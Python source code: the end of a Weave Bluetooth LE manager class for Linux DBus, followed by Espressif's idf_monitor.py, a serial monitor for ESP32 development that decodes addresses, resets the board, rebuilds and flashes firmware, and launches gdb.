self.logger.info("weave tx char cannot be found")
self.connect_state = False
return False
return True
def connect_bg_implementation(self, **kwargs):
self.connect_state = False
if self.adapter is None:
self.logger.info("adapter is not configured")
return
self.target.device_register_signal()
self.target.device_bg_connect(True)
if self.weaveServieCharConnect():
self.logger.info("connect success")
self.connect_state = True
else:
self.logger.info("connect fail")
self.connect_state = False
def disconnect_bg_implementation(self, **kwargs):
if self.target:
self.target.device_bg_connect(False)
if self.tx:
self.tx.destroy()
self.tx = None
if self.rx:
self.rx.destroy()
self.rx = None
if self.service:
self.service.destroy()
self.service = None
def connect(self, identifier):
found = False
self.logger.info("trying to connect to " + identifier)
for p in self.peripheral_list:
p_id = str(p.device_id)
p_name = str(p.Name)
p_address = str(p.Address)
self.logger.debug(p_id + " vs " + str(identifier))
self.logger.debug(p_name + " vs " + str(identifier))
self.logger.debug(p_address + " vs " + str(identifier))
if p_id == str(identifier) or p_name == str(identifier) or p_address.upper() == str(identifier).upper():
self.target = p
found = True
break
if found:
self.runLoopUntil(self.connect_bg_implementation, identifier = identifier, timeout=bleConnectTimeoutSec)
if self.connect_state:
return True
else:
return False
else:
print("device cannot be found")
return False
def disconnect(self):
self.runLoopUntil(self.disconnect_bg_implementation)
for i in range(2):
n = gc.collect()
self.logger.debug("Unreached objects: %d", n)
self.logger.debug("Final Garbage:")
self.logger.debug(pprint.pformat(gc.garbage))
def WriteCharactertisticSuccessCB(self, *args):
self.logger.debug("write complete")
if self.devMgr:
txEvent = BleTxEvent(charId=self.charId_tx, svcId=self.svcId_tx, status=True)
self.weave_queue.put(txEvent)
self.devMgr.DriveBleIO()
def WriteCharactertisticErrorCB(self, *args):
self.logger.debug("write fail, error:" + repr(args))
if self.devMgr:
txEvent = BleTxEvent(charId=self.charId_tx, svcId=self.svcId_tx, status=False)
self.weave_queue.put(txEvent)
self.devMgr.DriveBleIO()
def WriteBleCharacteristic(self, connObj, svcId, charId, buffer, length):
self.logger.debug("write start")
result = False
if self.target and self.target.Connected:
converted_data = WeaveUtility.VoidPtrToByteArray(buffer, length)
self.charId_tx = bytearray(uuid.UUID(str(VoidPtrToUUIDString(charId, 16))).bytes)
self.svcId_tx = bytearray(uuid.UUID(str(VoidPtrToUUIDString(svcId, 16))).bytes)
self.tx.WriteValue(dbus.Array([dbus.Byte(i) for i in converted_data], 'y'),
options="",
reply_handler=self.WriteCharactertisticSuccessCB,
error_handler=self.WriteCharactertisticErrorCB,
timeout=bleWriteCharacteristicTimeoutSec)
result = True
else:
self.logger.warning("WARNING: peripheral is no longer connected.")
return result
def receivedNotificationCB(self, data):
self.logger.debug("received data")
bytes = bytearray(data)
if self.devMgr:
rxEvent = BleRxEvent(charId=self.charId_rx, svcId=self.svcId_rx, buffer=bytes)
self.weave_queue.put(rxEvent)
self.devMgr.DriveBleIO()
def subscribeSuccessCb(self, *args):
self.logger.debug("subscribe complete")
if self.rx.Notifying:
success = True
else:
success = False
operation = BleSubscribeOperation_Subscribe
if self.devMgr:
subscribeEvent = BleSubscribeEvent(charId=self.charId_rx,
svcId=self.svcId_rx,
status=success,
operation=operation)
self.weave_queue.put(subscribeEvent)
self.devMgr.DriveBleIO()
def subscribeErrorCb(self, *args):
self.logger.error("subscribe fail, error:" + repr(args))
success = False
operation = BleSubscribeOperation_Subscribe
if self.devMgr:
subscribeEvent = BleSubscribeEvent(charId=self.charId_rx,
svcId=self.svcId_rx,
status=success,
operation=operation)
self.weave_queue.put(subscribeEvent)
self.devMgr.DriveBleIO()
def unsubscribeSuccessCb(self, *args):
self.logger.debug("unsubscribe complete")
success = True
operation = BleSubscribeOperation_Unsubscribe
if self.devMgr:
subscribeEvent = BleSubscribeEvent(charId=self.charId_rx,
svcId=self.svcId_rx,
status=success,
operation=operation)
self.weave_queue.put(subscribeEvent)
self.devMgr.DriveBleIO()
def unsubscribeErrorCb(self, *args):
self.logger.error("unsubscribe fail, error:" + repr(args))
success = False
operation = BleSubscribeOperation_Unsubscribe
if self.devMgr:
subscribeEvent = BleSubscribeEvent(charId=self.charId_rx,
svcId=self.svcId_rx,
status=success,
operation=operation)
self.weave_queue.put(subscribeEvent)
self.devMgr.DriveBleIO()
def SubscribeBleCharacteristic(self, connObj, svcId, charId, subscribe):
result = False
self.charId_rx = bytearray(uuid.UUID(VoidPtrToUUIDString(charId, 16)).bytes)
self.svcId_rx = bytearray(uuid.UUID(str(VoidPtrToUUIDString(svcId, 16))).bytes)
if self.target and self.target.Connected:
try:
if subscribe:
self.logger.debug("try to subscribe")
self.rx.StartNotify(cbfunct=self.receivedNotificationCB,
reply_handler=self.subscribeSuccessCb,
error_handler=self.subscribeErrorCb,
timeout=bleSubscribeTimeoutSec)
else:
self.logger.debug("try to unsubscribe")
self.rx.StopNotify(reply_handler=self.unsubscribeSuccessCb,
error_handler=self.unsubscribeErrorCb,
timeout=bleSubscribeTimeoutSec)
except:
self.logger.debug(traceback.format_exc())
self.logger.debug("(un)subscribe error")
result = True
else:
self.logger.warning("WARNING: peripheral is no longer connected.")
return result
def GetBleEvent(self):
""" Called by WeaveDeviceMgr.py on behalf of Weave to retrieve a queued message."""
if not self.weave_queue.empty():
ev = self.weave_queue.get()
if isinstance(ev, BleRxEvent):
eventStruct = BleRxEventStruct.fromBleRxEvent(ev)
return cast( pointer(eventStruct), c_void_p).value
elif isinstance(ev, BleTxEvent):
eventStruct = BleTxEventStruct.fromBleTxEvent(ev)
return cast( pointer(eventStruct), c_void_p).value
elif isinstance(ev, BleSubscribeEvent):
eventStruct = BleSubscribeEventStruct.fromBleSubscribeEvent(ev)
return cast( pointer(eventStruct), c_void_p).value
elif isinstance(ev, BleDisconnectEvent):
eventStruct = BleDisconnectEventStruct.fromBleDisconnectEvent(ev)
return cast( pointer(eventStruct), c_void_p).value
return None
def ble_debug_log(self, line):
args = self.ParseInputLine(line)
if int(args[0]) == 1:
self.logger.setLevel(logging.DEBUG)
self.logger.debug("current logging level is debug")
else:
self.logger.setLevel(logging.INFO)
self.logger.info("current logging level is info")
return True
def CloseBle(self, connObj):
""" Called by Weave to close the BLE connection."""
# Workaround: comment out disconnect because of hang when close, plz call disconnect explicitly after close
# Need to fix it
# self.disconnect()
if self.devMgr:
dcEvent = BleDisconnectEvent(BLE_ERROR_REMOTE_DEVICE_DISCONNECTED)
self.weave_queue.put(dcEvent)
self.devMgr.DriveBleIO()
return True
|
idf_monitor.py
|
#!/usr/bin/env python
#
# esp-idf serial output monitor tool. Does some helpful things:
# - Looks up hex addresses in ELF file with addr2line
# - Reset ESP32 via serial RTS line (Ctrl-T Ctrl-R)
# - Run flash build target to rebuild and flash entire project (Ctrl-T Ctrl-F)
# - Run app-flash build target to rebuild and flash app only (Ctrl-T Ctrl-A)
# - If gdbstub output is detected, gdb is automatically loaded
#
# Copyright 2015-2016 Espressif Systems (Shanghai) PTE LTD
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
# Contains elements taken from miniterm "Very simple serial terminal" which
# is part of pySerial. https://github.com/pyserial/pyserial
# (C)2002-2015 Chris Liechti <cliechti@gmx.net>
#
# Originally released under BSD-3-Clause license.
#
from __future__ import print_function, division
from __future__ import unicode_literals
from builtins import chr
from builtins import object
from builtins import bytes
import subprocess
import argparse
import codecs
import datetime
import re
import os
try:
import queue
except ImportError:
import Queue as queue
import shlex
import time
import sys
import serial
import serial.tools.list_ports
import serial.tools.miniterm as miniterm
import threading
import ctypes
import types
from distutils.version import StrictVersion
from io import open
import textwrap
key_description = miniterm.key_description
# Control-key characters
CTRL_A = '\x01'
CTRL_B = '\x02'
CTRL_F = '\x06'
CTRL_H = '\x08'
CTRL_R = '\x12'
CTRL_T = '\x14'
CTRL_Y = '\x19'
CTRL_P = '\x10'
CTRL_X = '\x18'
CTRL_L = '\x0c'
CTRL_RBRACKET = '\x1d' # Ctrl+]
# Command parsed from console inputs
CMD_STOP = 1
CMD_RESET = 2
CMD_MAKE = 3
CMD_APP_FLASH = 4
CMD_OUTPUT_TOGGLE = 5
CMD_TOGGLE_LOGGING = 6
CMD_ENTER_BOOT = 7
# ANSI terminal codes (if changed, regular expressions in LineMatcher need to be udpated)
ANSI_RED = '\033[1;31m'
ANSI_YELLOW = '\033[0;33m'
ANSI_NORMAL = '\033[0m'
def color_print(message, color):
""" Print a message to stderr with colored highlighting """
sys.stderr.write("%s%s%s\n" % (color, message, ANSI_NORMAL))
def yellow_print(message):
color_print(message, ANSI_YELLOW)
def red_print(message):
color_print(message, ANSI_RED)
__version__ = "1.1"
# Tags for tuples in queues
TAG_KEY = 0
TAG_SERIAL = 1
TAG_SERIAL_FLUSH = 2
TAG_CMD = 3
# regex matches an potential PC value (0x4xxxxxxx)
MATCH_PCADDR = re.compile(r'0x4[0-9a-f]{7}', re.IGNORECASE)
DEFAULT_TOOLCHAIN_PREFIX = "xtensa-esp32-elf-"
DEFAULT_PRINT_FILTER = ""
class StoppableThread(object):
"""
Provide a Thread-like class which can be 'cancelled' via a subclass-provided
cancellation method.
Can be started and stopped multiple times.
Isn't an instance of type Thread because Python Thread objects can only be run once
"""
def __init__(self):
self._thread = None
@property
def alive(self):
"""
Is 'alive' whenever the internal thread object exists
"""
return self._thread is not None
def start(self):
if self._thread is None:
self._thread = threading.Thread(target=self._run_outer)
self._thread.start()
def _cancel(self):
pass # override to provide cancellation functionality
def run(self):
pass # override for the main thread behaviour
def _run_outer(self):
try:
self.run()
finally:
self._thread = None
def stop(self):
if self._thread is not None:
old_thread = self._thread
self._thread = None
self._cancel()
old_thread.join()
class ConsoleReader(StoppableThread):
""" Read input keys from the console and push them to the queue,
until stopped.
"""
def __init__(self, console, event_queue, cmd_queue, parser, test_mode):
super(ConsoleReader, self).__init__()
self.console = console
self.event_queue = event_queue
self.cmd_queue = cmd_queue
self.parser = parser
self.test_mode = test_mode
def run(self):
self.console.setup()
try:
while self.alive:
try:
if os.name == 'nt':
# Windows kludge: because the console.cancel() method doesn't
# seem to work to unblock getkey() on the Windows implementation.
#
# So we only call getkey() if we know there's a key waiting for us.
import msvcrt
while not msvcrt.kbhit() and self.alive:
time.sleep(0.1)
if not self.alive:
break
elif self.test_mode:
# In testing mode the stdin is connected to PTY but is not used for input anything. For PTY
# the canceling by fcntl.ioctl isn't working and would hang in self.console.getkey().
# Therefore, we avoid calling it.
while self.alive:
time.sleep(0.1)
break
c = self.console.getkey()
except KeyboardInterrupt:
c = '\x03'
if c is not None:
ret = self.parser.parse(c)
if ret is not None:
(tag, cmd) = ret
# stop command should be executed last
if tag == TAG_CMD and cmd != CMD_STOP:
self.cmd_queue.put(ret)
else:
self.event_queue.put(ret)
finally:
self.console.cleanup()
def _cancel(self):
if os.name == 'posix' and not self.test_mode:
# this is the way cancel() is implemented in pyserial 3.3 or newer,
# older pyserial (3.1+) has cancellation implemented via 'select',
# which does not work when console sends an escape sequence response
#
# even older pyserial (<3.1) does not have this method
#
# on Windows there is a different (also hacky) fix, applied above.
#
# note that TIOCSTI is not implemented in WSL / bash-on-Windows.
# TODO: introduce some workaround to make it work there.
#
# Note: This would throw exception in testing mode when the stdin is connected to PTY.
import fcntl
import termios
fcntl.ioctl(self.console.fd, termios.TIOCSTI, b'\0')
class ConsoleParser(object):
def __init__(self, eol="CRLF"):
self.translate_eol = {
"CRLF": lambda c: c.replace("\n", "\r\n"),
"CR": lambda c: c.replace("\n", "\r"),
"LF": lambda c: c.replace("\r", "\n"),
}[eol]
self.menu_key = CTRL_T
self.exit_key = CTRL_RBRACKET
self._pressed_menu_key = False
def parse(self, key):
ret = None
if self._pressed_menu_key:
ret = self._handle_menu_key(key)
elif key == self.menu_key:
self._pressed_menu_key = True
elif key == self.exit_key:
ret = (TAG_CMD, CMD_STOP)
else:
key = self.translate_eol(key)
ret = (TAG_KEY, key)
return ret
def _handle_menu_key(self, c):
ret = None
if c == self.exit_key or c == self.menu_key: # send verbatim
ret = (TAG_KEY, c)
elif c in [CTRL_H, 'h', 'H', '?']:
red_print(self.get_help_text())
elif c == CTRL_R: # Reset device via RTS
ret = (TAG_CMD, CMD_RESET)
elif c == CTRL_F: # Recompile & upload
ret = (TAG_CMD, CMD_MAKE)
elif c in [CTRL_A, 'a', 'A']: # Recompile & upload app only
# "CTRL-A" cannot be captured with the default settings of the Windows command line, therefore, "A" can be used
# instead
ret = (TAG_CMD, CMD_APP_FLASH)
elif c == CTRL_Y: # Toggle output display
ret = (TAG_CMD, CMD_OUTPUT_TOGGLE)
elif c == CTRL_L: # Toggle saving output into file
ret = (TAG_CMD, CMD_TOGGLE_LOGGING)
elif c == CTRL_P:
yellow_print("Pause app (enter bootloader mode), press Ctrl-T Ctrl-R to restart")
# to fast trigger pause without press menu key
ret = (TAG_CMD, CMD_ENTER_BOOT)
elif c in [CTRL_X, 'x', 'X']: # Exiting from within the menu
ret = (TAG_CMD, CMD_STOP)
else:
red_print('--- unknown menu character {} --'.format(key_description(c)))
self._pressed_menu_key = False
return ret
def get_help_text(self):
text = """\
--- idf_monitor ({version}) - ESP-IDF monitor tool
--- based on miniterm from pySerial
---
--- {exit:8} Exit program
--- {menu:8} Menu escape key, followed by:
--- Menu keys:
--- {menu:14} Send the menu character itself to remote
--- {exit:14} Send the exit character itself to remote
--- {reset:14} Reset target board via RTS line
--- {makecmd:14} Build & flash project
--- {appmake:14} Build & flash app only
--- {output:14} Toggle output display
--- {log:14} Toggle saving output into file
--- {pause:14} Reset target into bootloader to pause app via RTS line
--- {menuexit:14} Exit program
""".format(version=__version__,
exit=key_description(self.exit_key),
menu=key_description(self.menu_key),
reset=key_description(CTRL_R),
makecmd=key_description(CTRL_F),
appmake=key_description(CTRL_A) + ' (or A)',
output=key_description(CTRL_Y),
log=key_description(CTRL_L),
pause=key_description(CTRL_P),
menuexit=key_description(CTRL_X) + ' (or X)')
return textwrap.dedent(text)
def get_next_action_text(self):
text = """\
--- Press {} to exit monitor.
--- Press {} to build & flash project.
--- Press {} to build & flash app.
--- Press any other key to resume monitor (resets target).
""".format(key_description(self.exit_key),
key_description(CTRL_F),
key_description(CTRL_A))
return textwrap.dedent(text)
def parse_next_action_key(self, c):
ret = None
if c == self.exit_key:
ret = (TAG_CMD, CMD_STOP)
elif c == CTRL_F: # Recompile & upload
ret = (TAG_CMD, CMD_MAKE)
elif c in [CTRL_A, 'a', 'A']: # Recompile & upload app only
# "CTRL-A" cannot be captured with the default settings of the Windows command line, therefore, "A" can be used
# instead
ret = (TAG_CMD, CMD_APP_FLASH)
return ret
class SerialReader(StoppableThread):
""" Read serial data from the serial port and push to the
event queue, until stopped.
"""
def __init__(self, serial, event_queue):
super(SerialReader, self).__init__()
self.baud = serial.baudrate
self.serial = serial
self.event_queue = event_queue
if not hasattr(self.serial, 'cancel_read'):
# enable timeout for checking alive flag,
# if cancel_read not available
self.serial.timeout = 0.25
def run(self):
if not self.serial.is_open:
self.serial.baudrate = self.baud
self.serial.rts = True # Force an RTS reset on open
self.serial.open()
self.serial.rts = False
self.serial.dtr = self.serial.dtr # usbser.sys workaround
try:
while self.alive:
data = self.serial.read(self.serial.in_waiting or 1)
if len(data):
self.event_queue.put((TAG_SERIAL, data), False)
finally:
self.serial.close()
def _cancel(self):
if hasattr(self.serial, 'cancel_read'):
try:
self.serial.cancel_read()
except Exception:
pass
class LineMatcher(object):
"""
Assembles a dictionary of filtering rules based on the --print_filter
argument of idf_monitor. Then later it is used to match lines and
determine whether they should be shown on screen or not.
"""
LEVEL_N = 0
LEVEL_E = 1
LEVEL_W = 2
LEVEL_I = 3
LEVEL_D = 4
LEVEL_V = 5
level = {'N': LEVEL_N, 'E': LEVEL_E, 'W': LEVEL_W, 'I': LEVEL_I, 'D': LEVEL_D,
'V': LEVEL_V, '*': LEVEL_V, '': LEVEL_V}
def __init__(self, print_filter):
self._dict = dict()
self._re = re.compile(r'^(?:\033\[[01];?[0-9]+m?)?([EWIDV]) \([0-9]+\) ([^:]+): ')
items = print_filter.split()
if len(items) == 0:
self._dict["*"] = self.LEVEL_V # default is to print everything
for f in items:
s = f.split(r':')
if len(s) == 1:
# specifying no warning level defaults to verbose level
lev = self.LEVEL_V
elif len(s) == 2:
if len(s[0]) == 0:
raise ValueError('No tag specified in filter ' + f)
try:
lev = self.level[s[1].upper()]
except KeyError:
raise ValueError('Unknown warning level in filter ' + f)
else:
raise ValueError('Missing ":" in filter ' + f)
self._dict[s[0]] = lev
def match(self, line):
try:
m = self._re.search(line)
if m:
lev = self.level[m.group(1)]
if m.group(2) in self._dict:
return self._dict[m.group(2)] >= lev
return self._dict.get("*", self.LEVEL_N) >= lev
except (KeyError, IndexError):
# Regular line written with something else than ESP_LOG*
# or an empty line.
pass
# We need something more than "*.N" for printing.
return self._dict.get("*", self.LEVEL_N) > self.LEVEL_N
class SerialStopException(Exception):
"""
This exception is used for stopping the IDF monitor in testing mode.
"""
pass
class Monitor(object):
"""
Monitor application main class.
This was originally derived from miniterm.Miniterm, but it turned out to be easier to write from scratch for this
purpose.
Main difference is that all event processing happens in the main thread, not the worker threads.
"""
def __init__(self, serial_instance, elf_file, print_filter, make="make", encrypted=False,
toolchain_prefix=DEFAULT_TOOLCHAIN_PREFIX, eol="CRLF"):
super(Monitor, self).__init__()
self.event_queue = queue.Queue()
self.cmd_queue = queue.Queue()
self.console = miniterm.Console()
if os.name == 'nt':
sys.stderr = ANSIColorConverter(sys.stderr, decode_output=True)
self.console.output = ANSIColorConverter(self.console.output)
self.console.byte_output = ANSIColorConverter(self.console.byte_output)
if StrictVersion(serial.VERSION) < StrictVersion('3.3.0'):
# Use Console.getkey implementation from 3.3.0 (to be in sync with the ConsoleReader._cancel patch above)
def getkey_patched(self):
c = self.enc_stdin.read(1)
if c == chr(0x7f):
c = chr(8) # map the BS key (which yields DEL) to backspace
return c
self.console.getkey = types.MethodType(getkey_patched, self.console)
socket_mode = serial_instance.port.startswith("socket://") # testing hook - data from serial can make exit the monitor
self.serial = serial_instance
self.console_parser = ConsoleParser(eol)
self.console_reader = ConsoleReader(self.console, self.event_queue, self.cmd_queue, self.console_parser, socket_mode)
self.serial_reader = SerialReader(self.serial, self.event_queue)
self.elf_file = elf_file
if not os.path.exists(make):
self.make = shlex.split(make) # allow for possibility the "make" arg is a list of arguments (for idf.py)
else:
self.make = make
self.encrypted = encrypted
self.toolchain_prefix = toolchain_prefix
# internal state
self._last_line_part = b""
self._gdb_buffer = b""
self._pc_address_buffer = b""
self._line_matcher = LineMatcher(print_filter)
self._invoke_processing_last_line_timer = None
self._force_line_print = False
self._output_enabled = True
self._serial_check_exit = socket_mode
self._log_file = None
def invoke_processing_last_line(self):
self.event_queue.put((TAG_SERIAL_FLUSH, b''), False)
def main_loop(self):
self.console_reader.start()
self.serial_reader.start()
try:
while self.console_reader.alive and self.serial_reader.alive:
try:
item = self.cmd_queue.get_nowait()
except queue.Empty:
try:
item = self.event_queue.get(True, 0.03)
except queue.Empty:
continue
(event_tag, data) = item
if event_tag == TAG_CMD:
self.handle_commands(data)
elif event_tag == TAG_KEY:
try:
self.serial.write(codecs.encode(data))
except serial.SerialException:
pass # this shouldn't happen, but sometimes port has closed in serial thread
except UnicodeEncodeError:
pass # this can happen if a non-ascii character was passed, ignoring
elif event_tag == TAG_SERIAL:
self.handle_serial_input(data)
if self._invoke_processing_last_line_timer is not None:
self._invoke_processing_last_line_timer.cancel()
self._invoke_processing_last_line_timer = threading.Timer(0.1, self.invoke_processing_last_line)
self._invoke_processing_last_line_timer.start()
# If no futher data is received in the next short period
# of time then the _invoke_processing_last_line_timer
# generates an event which will result in the finishing of
# the last line. This is fix for handling lines sent
# without EOL.
elif event_tag == TAG_SERIAL_FLUSH:
self.handle_serial_input(data, finalize_line=True)
else:
raise RuntimeError("Bad event data %r" % ((event_tag,data),))
except SerialStopException:
sys.stderr.write(ANSI_NORMAL + "Stopping condition has been received\n")
finally:
try:
self.console_reader.stop()
self.serial_reader.stop()
self.stop_logging()
# Cancelling _invoke_processing_last_line_timer is not
# important here because receiving empty data doesn't matter.
self._invoke_processing_last_line_timer = None
except Exception:
pass
sys.stderr.write(ANSI_NORMAL + "\n")
def handle_serial_input(self, data, finalize_line=False):
sp = data.split(b'\n')
if self._last_line_part != b"":
# add unprocessed part from previous "data" to the first line
sp[0] = self._last_line_part + sp[0]
self._last_line_part = b""
if sp[-1] != b"":
# last part is not a full line
self._last_line_part = sp.pop()
for line in sp:
if line != b"":
if self._serial_check_exit and line == self.console_parser.exit_key.encode('latin-1'):
raise SerialStopException()
if self._force_line_print or self._line_matcher.match(line.decode(errors="ignore")):
self._print(line + b'\n')
self.handle_possible_pc_address_in_line(line)
self.check_gdbstub_trigger(line)
self._force_line_print = False
# Now we have the last part (incomplete line) in _last_line_part. By
# default we don't touch it and just wait for the arrival of the rest
# of the line. But after some time when we didn't received it we need
# to make a decision.
if self._last_line_part != b"":
if self._force_line_print or (finalize_line and self._line_matcher.match(self._last_line_part.decode(errors="ignore"))):
self._force_line_print = True
self._print(self._last_line_part)
self.handle_possible_pc_address_in_line(self._last_line_part)
self.check_gdbstub_trigger(self._last_line_part)
# It is possible that the incomplete line cuts in half the PC
# address. A small buffer is kept and will be used the next time
# handle_possible_pc_address_in_line is invoked to avoid this problem.
# MATCH_PCADDR matches 10 character long addresses. Therefore, we
# keep the last 9 characters.
self._pc_address_buffer = self._last_line_part[-9:]
# GDB sequence can be cut in half also. GDB sequence is 7
# characters long, therefore, we save the last 6 characters.
self._gdb_buffer = self._last_line_part[-6:]
self._last_line_part = b""
# else: keeping _last_line_part and it will be processed the next time
# handle_serial_input is invoked
def handle_possible_pc_address_in_line(self, line):
line = self._pc_address_buffer + line
self._pc_address_buffer = b""
for m in re.finditer(MATCH_PCADDR, line.decode(errors="ignore")):
self.lookup_pc_address(m.group())
def __enter__(self):
""" Use 'with self' to temporarily disable monitoring behaviour """
self.serial_reader.stop()
self.console_reader.stop()
def __exit__(self, *args, **kwargs):
""" Use 'with self' to temporarily disable monitoring behaviour """
self.console_reader.start()
self.serial_reader.start()
def prompt_next_action(self, reason):
self.console.setup() # set up console to trap input characters
try:
red_print("--- {}".format(reason))
red_print(self.console_parser.get_next_action_text())
k = CTRL_T # ignore CTRL-T here, so people can muscle-memory Ctrl-T Ctrl-F, etc.
while k == CTRL_T:
k = self.console.getkey()
finally:
self.console.cleanup()
ret = self.console_parser.parse_next_action_key(k)
if ret is not None:
cmd = ret[1]
if cmd == CMD_STOP:
# the stop command should be handled last
self.event_queue.put(ret)
else:
self.cmd_queue.put(ret)
def run_make(self, target):
with self:
if isinstance(self.make, list):
popen_args = self.make + [target]
else:
popen_args = [self.make, target]
yellow_print("Running %s..." % " ".join(popen_args))
p = subprocess.Popen(popen_args)
try:
p.wait()
except KeyboardInterrupt:
p.wait()
if p.returncode != 0:
self.prompt_next_action("Build failed")
else:
self.output_enable(True)
def lookup_pc_address(self, pc_addr):
cmd = ["%saddr2line" % self.toolchain_prefix,
"-pfiaC", "-e", self.elf_file, pc_addr]
try:
translation = subprocess.check_output(cmd, cwd=".")
if b"?? ??:0" not in translation:
self._print(translation.decode(), console_printer=yellow_print)
except OSError as e:
red_print("%s: %s" % (" ".join(cmd), e))
def check_gdbstub_trigger(self, line):
line = self._gdb_buffer + line
self._gdb_buffer = b""
m = re.search(b"\\$(T..)#(..)", line) # look for a gdb "reason" for a break
if m is not None:
try:
chsum = sum(ord(bytes([p])) for p in m.group(1)) & 0xFF
calc_chsum = int(m.group(2), 16)
except ValueError:
return # payload wasn't valid hex digits
if chsum == calc_chsum:
self.run_gdb()
else:
red_print("Malformed gdb message... calculated checksum %02x received %02x" % (chsum, calc_chsum))
def run_gdb(self):
with self: # disable console control
sys.stderr.write(ANSI_NORMAL)
try:
cmd = ["%sgdb" % self.toolchain_prefix,
"-ex", "set serial baud %d" % self.serial.baudrate,
"-ex", "target remote %s" % self.serial.port,
"-ex", "interrupt", # monitor has already parsed the first 'reason' command, need a second
self.elf_file]
process = subprocess.Popen(cmd, cwd=".")
process.wait()
except OSError as e:
red_print("%s: %s" % (" ".join(cmd), e))
except KeyboardInterrupt:
pass # happens on Windows, maybe other OSes
finally:
try:
# on Linux, maybe other OSes, gdb sometimes seems to be alive even after wait() returns...
process.terminate()
except Exception:
pass
try:
# also on Linux, maybe other OSes, gdb sometimes exits uncleanly and breaks the tty mode
subprocess.call(["stty", "sane"])
except Exception:
pass # don't care if there's no stty, we tried...
self.prompt_next_action("gdb exited")
def output_enable(self, enable):
self._output_enabled = enable
def output_toggle(self):
self._output_enabled = not self._output_enabled
yellow_print("\nToggle output display: {}, Type Ctrl-T Ctrl-Y to show/disable output again.".format(self._output_enabled))
def toggle_logging(self):
if self._log_file:
self.stop_logging()
else:
self.start_logging()
def start_logging(self):
if not self._log_file:
try:
name = "log.{}.{}.txt".format(os.path.splitext(os.path.basename(self.elf_file))[0],
datetime.datetime.now().strftime('%Y%m%d%H%M%S'))
self._log_file = open(name, "wb+")
yellow_print("\nLogging is enabled into file {}".format(name))
except Exception as e:
red_print("\nLog file {} cannot be created: {}".format(name, e))
def stop_logging(self):
if self._log_file:
try:
name = self._log_file.name
self._log_file.close()
yellow_print("\nLogging is disabled and file {} has been closed".format(name))
except Exception as e:
red_print("\nLog file cannot be closed: {}".format(e))
finally:
self._log_file = None
def _print(self, string, console_printer=None):
if console_printer is None:
console_printer = self.console.write_bytes
if self._output_enabled:
console_printer(string)
if self._log_file:
try:
if isinstance(string, type(u'')):
string = string.encode()
self._log_file.write(string)
except Exception as e:
red_print("\nCannot write to file: {}".format(e))
# don't fill-up the screen with the previous errors (probably consequent prints would fail also)
self.stop_logging()
def handle_commands(self, cmd):
if cmd == CMD_STOP:
self.console_reader.stop()
self.serial_reader.stop()
elif cmd == CMD_RESET:
self.serial.setRTS(True)
self.serial.setDTR(self.serial.dtr) # usbser.sys workaround
time.sleep(0.2)
self.serial.setRTS(False)
self.serial.setDTR(self.serial.dtr) # usbser.sys workaround
self.output_enable(True)
elif cmd == CMD_MAKE:
self.run_make("encrypted-flash" if self.encrypted else "flash")
elif cmd == CMD_APP_FLASH:
self.run_make("encrypted-app-flash" if self.encrypted else "app-flash")
elif cmd == CMD_OUTPUT_TOGGLE:
self.output_toggle()
elif cmd == CMD_TOGGLE_LOGGING:
self.toggle_logging()
elif cmd == CMD_ENTER_BOOT:
self.serial.setDTR(False) # IO0=HIGH
self.serial.setRTS(True) # EN=LOW, chip in reset
self.serial.setDTR(self.serial.dtr) # usbser.sys workaround
time.sleep(1.3) # timeouts taken from esptool.py, includes esp32r0 workaround. defaults: 0.1
self.serial.setDTR(True) # IO0=LOW
self.serial.setRTS(False) # EN=HIGH, chip out of reset
self.serial.setDTR(self.serial.dtr) # usbser.sys workaround
time.sleep(0.45) # timeouts taken from esptool.py, includes esp32r0 workaround. defaults: 0.05
self.serial.setDTR(False) # IO0=HIGH, done
else:
raise RuntimeError("Bad command data %d" % (cmd))
def main():
def _get_default_serial_port():
"""
Same logic for detecting serial port as esptool.py and idf.py: reverse sort by name and choose the first port.
"""
try:
ports = list(reversed(sorted(p.device for p in serial.tools.list_ports.comports())))
return ports[0]
except Exception:
return '/dev/ttyUSB0'
parser = argparse.ArgumentParser("idf_monitor - a serial output monitor for esp-idf")
parser.add_argument(
'--port', '-p',
help='Serial port device',
default=os.environ.get('ESPTOOL_PORT', _get_default_serial_port())
)
parser.add_argument(
'--baud', '-b',
help='Serial port baud rate',
type=int,
default=os.getenv('IDF_MONITOR_BAUD', os.getenv('MONITORBAUD', 115200)))
parser.add_argument(
'--make', '-m',
help='Command to run make',
type=str, default='make')
parser.add_argument(
'--encrypted',
help='Use encrypted targets while running make',
action='store_true')
parser.add_argument(
'--toolchain-prefix',
help="Triplet prefix to add before cross-toolchain names",
default=DEFAULT_TOOLCHAIN_PREFIX)
parser.add_argument(
"--eol",
choices=['CR', 'LF', 'CRLF'],
type=lambda c: c.upper(),
help="End of line to use when sending to the serial port",
default='CR')
parser.add_argument(
'elf_file', help='ELF file of application',
type=argparse.FileType('rb'))
parser.add_argument(
'--print_filter',
help="Filtering string",
default=DEFAULT_PRINT_FILTER)
args = parser.parse_args()
if args.port.startswith("/dev/tty."):
args.port = args.port.replace("/dev/tty.", "/dev/cu.")
yellow_print("--- WARNING: Serial ports accessed as /dev/tty.* will hang gdb if launched.")
yellow_print("--- Using %s instead..." % args.port)
serial_instance = serial.serial_for_url(args.port, args.baud,
do_not_open=True)
serial_instance.dtr = False
serial_instance.rts = False
args.elf_file.close() # don't need this as a file
# remove the parallel jobserver arguments from MAKEFLAGS, as any
# parent make is only running 1 job (monitor), so we can re-spawn
# all of the child makes we need (the -j argument remains part of
# MAKEFLAGS)
try:
makeflags = os.environ["MAKEFLAGS"]
makeflags = re.sub(r"--jobserver[^ =]*=[0-9,]+ ?", "", makeflags)
os.environ["MAKEFLAGS"] = makeflags
except KeyError:
pass # not running a make jobserver
monitor = Monitor(serial_instance, args.elf_file.name, args.print_filter, args.make, args.encrypted,
args.toolchain_prefix, args.eol)
yellow_print('--- idf_monitor on {p.name} {p.baudrate} ---'.format(
p=serial_instance))
yellow_print('--- Quit: {} | Menu: {} | Help: {} followed by {} ---'.format(
key_description(monitor.console_parser.exit_key),
key_description(monitor.console_parser.menu_key),
key_description(monitor.console_parser.menu_key),
key_description(CTRL_H)))
if args.print_filter != DEFAULT_PRINT_FILTER:
yellow_print('--- Print filter: {} ---'.format(args.print_filter))
monitor.main_loop()
